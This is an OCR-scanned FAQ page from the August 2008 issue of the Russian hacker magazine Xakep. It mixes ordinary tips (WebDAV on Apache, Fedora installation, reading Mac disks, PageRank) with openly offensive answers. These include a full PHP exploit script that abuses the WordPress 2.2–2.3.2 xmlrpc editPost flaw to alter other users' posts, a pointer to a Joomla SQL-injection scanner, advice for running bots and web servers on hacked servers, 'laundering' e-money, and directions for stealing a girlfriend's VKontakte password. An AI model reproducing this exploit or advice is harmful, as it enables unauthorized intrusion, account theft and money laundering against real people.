книги хакеры / журнал хакер / 116_Optimized

циально для тебя человек с ником beenudel1986 написал сканер джумлы на модули, уязвимые к скуль-инъекциям. Скачать тулзу можно по адресу beenuarora.com/code/joomsq.py. Для запуска скрипта тебе понадобится интерпретатор python. Запускать сканер необходимо следующим образом (например, для виндового cmd): «Пуск Выполнить cmd c:/путь/ python.exe C:/путь_к_сканеру/joomsq. py www.test.com».

Q: Как обменять (читай: «отмыть») e-деньги по наиболее выгодному курсу?

A: Уже давно появившийся сервис мониторинга обменных пунктов http://obmenniki.com/ пре-

доставляет тебе такую возможность. Приведем немного текста из описания проекта: «ПроектObmenniki.com— самый простой и удобный способ найти выгодный для Вас курс

моментального обмена e-gold, WebMoney, yandex.

деньги и других электронных валют.

С августа 2006 года мы осуществляем непрерывный мониторинг автоматических обменных пунктов с хорошей репутацией и резервом на обмен не менее $3000. Выбирая лучший курс, Вы можете доверять надежности обменных пунктов, включенных в рейтинг. Все представленные обменники имеют высокий Business Level webmoney и достаточные резервы.

Пользуясь нашим сервисом, Вы также можете быть уверены в актуальности всех данных: информация о резервах и курсах участников листинга обновляется ежеминутно».

Q: На моем взломанном дедике/хостинге нельзя юзать функцию php set_time_limit().

Из-за этого мой бот завершает работу через 30 секунд после ее начала. Подскажи, как обойти это ограничение?

A: Совсем недавно обнаруженная «фича» большинства версий интерпретатора PHP позволяет обходить ограничения set_time_limit(). Для небольшого хека тебе необходимо всего лишь прописать в начало скрипта строчку ini_ set("max_execution_time", 90000000).

Подробности багофичи, и как написать скрипт виндового шелла, основанного на этой технологии, ты можешь узнать здесь: securityvulns. ru/Sdocument748.html.

Q: Слышал о недавно обнаруженной баге в WordPress, которая позволяет редактировать посты любого юзера, но не понял, как ей пользоваться. Расскажите подробней.

A: Уязвимость работает на движках блога версий 2.2-2.3.2. Для начала тебе необходимо зарегист­ рироваться на блоге жертвы. После чего создавай PHP-скрипт со следующим содержанием:

<?php

$host = 'blog.com'; // домен

$page = '/wp232/xmlrpc.php'; //путь до скрипта xmlrpc, расположенного в корне блога

$data = '<?xml version="1.0" ?> <methodCall><methodName>metaWeblog

.editPost</methodName><params> <value><i4>НОМЕР_ПОСТА</i4> </value> <value><string>ИМЯ_ТВОЕГО_ЮЗЕРА</ string></value> <value><string>ПАРОЛЬ_ТВОЕГО_ЮЗЕРА</string></value>

<struct> <member><name>post_type</ name><value>page</value></member> <member><name>title</name><value>< string>ЗАГОЛОВОК_ПОСТА</string></ value></member> <member><name>description</ name><string>СОДЕРЖИВОЕ_ПОСТА</ string></member> </struct></params></methodCall>'; $exploited = fsockopen($host, 80, $errorNumber, $errorString); $requestHeader = " ".$page." HTTP/1.1\r\n";

$requestHeader.= "Host: ".$host."\ r\n";

$requestHeader.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";

$requestHeader.= "Content-Type: application/x-www-form-urlencoded\ r\n";

$requestHeader.= "Content-Length: ".strlen($data)."\r\n"; $requestHeader.= "Connection: close\r\n\r\n";

$requestHeader.= $data; fwrite($exploited, $requestHeader );

while (!feof($exploited))

{

print fread($exploited, 4800);

}

?>

Когда скрипт отработает, пост успешно отредактируется. Учти, тут есть один недостаток: хотя вновь отредактированные посты сваливаются в draft, админы блога, видя непонятно откуда взявшийся драфт, меняют его статус на «опубликованный». Дерзай!

Q: У меня есть виндовый дедик. Хочу поднять на нем веб-сервер для своих хакерских целей. Как проще всего это сделать?

A: Легче всего это сделать с помощью «базового пакета веб-разработчика» по прозванию Денвер, который доступен по адресу Denwer.ru. После

установки Денвера на дедик (также советую установить дополнительные модули activeperl, activepythonи все расширения PHP5) следуй инструкции:

1.Узнай с помощью утилиты ipconfig, какой IP-адрес у твоего сервера (Пуск Выполнить cmd ipconfig). После запуска утилиты ты увидишь что-то типа:

DNS-суффикс этого подключения . . : IP-адрес . . . . . . . . . . . . : 192.168.0.49

Маска подсети . . . . . . . . . : 255.255.255.0

Основной шлюз . . . . . . . . . . : 192.168.0.1

В данном случае внешний IP-адрес машины в локальной сети — 192.168.0.49. Его-то мы и возьмем за константу.

2.Тебе необходимо разрешить подключения с внешних машин во всех файрволах. Я объясню, как это сделать в брандмауэре Винды. Открывай «ПускПанель управленияБрандмауэр Windows». Переходи на вкладку «Исключения» и нажимай кнопку «Добавить порт». В поле «Имя» вводи IP-адрес твоего дедика (тот самый, из ipconfig), а в поле «Номер порта» укажи 80.

3.Теперь создавай в веб-директории Денвера папку с IP-адресом твоего сервера (например, Z:/ home/192.168.0.49/www). Перезапускай Денвер и пользуйся своим дедиком извне.

P.S. Больше подробностей и нюансов ищи на www.denwer.ru/faq/shared.html.

Q: Как высчитать Google PageRank ресурса? Сколько необходимо ссылок с более низким PR, чтобы получить более высокий PR?

A: Вот небольшая табличка тебе в помощь: http://www.seo-fakten.de/PageRank- Kalkulationstabelle.html. Для примера, чтобы получить PageRank 7, нужно:

•508277 страниц с PR=1;

•92414 страниц с PR=2;

•16803 страниц с PR=3;

•3055 страниц с PR=4;

•555 страниц с PR=5;

•100,992 страниц с PR=6;

•18,362 страниц с PR=7;

•3,339 страниц с PR=8;

•0,607 страниц с PR=9;

•0,110 страниц с PR=10;

Q:Обожаю ресурс vkontakte.ru. Как бы мне увести пароль моей подружки или как-ни- будь навредить нужному юзеру?

A:Хотя я и не люблю социальные сети, но ответить на твой вопрос придется :). Специально на тему разнообразного недокументированного использования Контакта на форуме античата

создан топик forum.antichat.ru/thread45578.html.

Процитирую начальные слова из него:

«Привет, котятки! Сегодня мы попро­ буем заняться паразитизмом на довольно крупном сервисе vkontakte. ru. Сервис страдает от огромного количества всевозможных проблем с безопасностью и просто багов. Рассмотрим пару самых занятных багов, может быть, напишем флудер/спаммер».

А вот — основные пункты топика, посвященные взлому Контакта:

1.Занимательный javascript.

2.Проблемы с безопасностью.

3.Многопоточный флудер.

Также в ответах к теме ты сможешь увидеть множество других багов.

P.S.На античате очень много топиков, посвященных vkontakte.ru. После прочтения того, который я описал выше, советую заюзать поиск на форуме.

Q: Покупаю недешевый домен с высоким PR. Как бы мне проверить PR этого домена на склейку?

A: Как известно, склейка — это PR, полученный одним доменом после переадресации на другой, с более высоким PR. Для проверки на склейку существует множество разнообразных сервисов. Вот некоторые из них:

1.http://www.be1.ru/services/stat — проверка наполовину ручная;

2.http://seocheck.net — позволяет проверять склейку в автоматическом режиме и PR по датацентрам;

3.http://checkpagerank.net — производит про-

верку в автоматическом режиме.

Но обычно все SEO-профессионалы советуют проверять домен на склейку вручную. Делается это, если рассказывать в общих чертах, так:

1.Проверь кэш Google по нескольким датацентрам.

2.Задай запрос info:aaa.orgи убедись, что показываемая информация относится именно к этому домену.

3.Тщательно проверяй количество и качество обратных ссылок на сайт. Если по информации того же Yahoo домен не имеет обратных ссылок, то очевидно, что PageRank взять ему было неоткуда.

Q: В офисе не разрешают устанавливать софт, приходится юзать Internet Explorer. Как прикрутить к нему проверку орфографии?

A: Голый IE никуда не годится, но если прикрутить к нему аддон IE7Pro(www.ie7pro.com), то можно выжать из него максимум. Во-первых, появится затребованная тобой проверка орфографии. Вовторых, дополнительные возможности работы с

140

вкладками (к счастью, хотя бы они реализованы в браузере по умолчанию). В-третьих, синхронизация закладок и управление сессиями.

Q: Как поднять WebDAV в Apache 2 под Windows?

A: Приведу решение в стиле HOWTO:

1.Скачивается и устанавливается Apache с сайта apache.org;

2.Вконфигеhttpd.conf раскомментируемстроки:

LoadModule dav_module modules/mod_ dav.so

LoadModule dav_fs_module modules/ mod_dav_fs.so

3.В тот же самый конфигурационный файл httpd.confдобавляем:

DavLockDB C:/webdavdb (папка должна существовать, используется для временных файлов)

DAVMinTimeout 600

BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully

BrowserMatch "MS FrontPage" redirect-carefully

BrowserMatch "^WebDrive" redirectcarefully

BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully

BrowserMatch "^gnome-vfs/1.0" redirect-carefully

BrowserMatch "^XML Spy" redirectcarefully

BrowserMatch "^Dreamweaver-WebDAV- SCM1" redirect-carefully

Alias /test C:/wd

AllowOverride None

Order allow,deny

Allow from all

DAV On

AuthType Basic

AuthName "WebDAV Restricted"

AuthUserFile C:/test.pass

Require user webdav

Замечу, что в test.pass в каждой строке содержится имя:пароль (через двоеточие) в открытом виде.

4.При доступе из Windows XP к папке WebDAV может возникнуть проблема — Windows передает для авторизации не просто имя пользователя, а домен\имя. Естественно, сервер его не пропускает. Самое простое решение: добавить

номер порта в адресную строку при подключении из Windows XP. Например, так: http://webdav. myserser.ru:80/test.

Q: У меня не получается установить Fedora 9 c диска ][. Программа установки прерывает работу с ошибкой на одном из этапов. В чем проблема? И как все-таки установить ОС?

A: К сожалению, даже у самых известных дистрибутивов могут оказаться ошибки в релизах. Впрочем, исправить проблему несложно. Предлагаю два варианта действий:

1.Выполнить установку системы в графическом режиме на русском языке, не изменяя список программных пакетов по умолчанию.

2.Выполнить установку системы в графическом режиме на английском языке, указав необходимость поддержки русского языка. После завер-

шения установки:

•загрузи систему;

•пройди шаги мастера первоначальной настройки и, войдя в систему, запусти программу system-config-languageиз окна терминала или Main Menu System Administration  Language;

•выбери русский язык.

После перезагрузки основным языком системы будет установлен русский.

Q: Купил ][акер за май, читаю FAQ. В «посте» о переносе почтовой базы с компа на Gmail меня удивило, что ты написал, что нет на данный момент решения, позволяющего перенести базу писем из The Bat! на Gmail. На самом деле, оно есть. И вот ответ.

A: Придется немного поработать ручками. Делается это так: для The Bat! нужно экспортировать все папки писем в формате Unix-ящика, удалить расширение (.mbx) и скопировать их в папку Thunderbird, в которой он хранит базу писем. После чего стоит запустить Thunderbird и пройтись по всем «новым» папкам. Далее можно выгружать письма на Gmail с помощью программыGoogleEmailUploader. (Спасибо за дополнение!- Прим. редакции)

Q: Как прочитать данные с жесткого диска, отформатированного для использования на

Mac?

A: Самый лучший вариант – воспользоваться специальной утилитой HFSExplorer(http://hem. bredband.net/catacombae/hfsx.html). Так ты по-

лучишь полный доступ к диску, который Windows не понимает в силу своей религии. Для работы этой замечательной тулзы понадобится Java2 RuntimeEnvironmentверсии 1.5.0 и старше. Если во время запуска программа вылетит с ошибкой, указав на отсутствие файла MSVCR71.dll,

скопируй его из <каталог с установленной

Java>\binв папку HFSExplorer. z

xàêåð 08 /116/ 08

x № 08(116) август 2008

Без окон, без дверей

WINDOWS 2008

SERVER CORE: WINDOWS

БЕЗ ГРАФИЧЕСКОЙ ОБОЛОЧКИ

СТР.116